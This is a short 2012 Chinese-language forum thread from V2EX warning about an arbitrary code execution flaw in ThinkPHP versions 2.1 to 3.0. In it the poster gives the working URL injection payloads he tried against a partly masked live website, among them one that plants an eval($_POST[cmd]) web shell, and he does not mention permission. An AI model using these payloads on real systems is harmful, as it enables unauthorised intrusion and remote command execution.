V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
ihacku
V2EX  ›  信息安全

ThinkPHP framework 任意代码执行漏洞预警

  •  
  •   ihacku · 2012-04-09 17:14:49 +08:00 · 4938 次点击
    这是一个创建于 4622 天前的主题,其中的信息可能已经有所发展或是发生改变。
    3 条回复    1970-01-01 08:00:00 +08:00
    mywaiting
        1
    mywaiting  
       2012-04-09 17:21:13 +08:00
    乌云多了个水区后,我显然多了个可以去的好地方
    ihacku
        2
    ihacku  
    OP
       2012-04-09 18:20:17 +08:00
    本来我是刚买完票 随手用AWS测试个站 报PHP code injection
    http://taot**.net/events/content/id/${@print(md5(acunetix_wvs_security_test))}
    后来才看到乌云上的帖子的
    http://taot**.net/events/content/id/${@print(THINK_VERSION)}
    版本2.1 漏洞影响到的版本包括2.1、2.2和3.0
    不知道具体怎么利用 试着在后面加了一句话
    http://taot**.net/events/content/id/${@eval($_POST[cmd])}
    都是一闪就过去了
    ihacku
        3
    ihacku  
    OP
       2012-04-09 18:22:26 +08:00
    唔 代码被转掉了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1042 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 20:22 · PVG 04:22 · LAX 12:22 · JFK 15:22
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.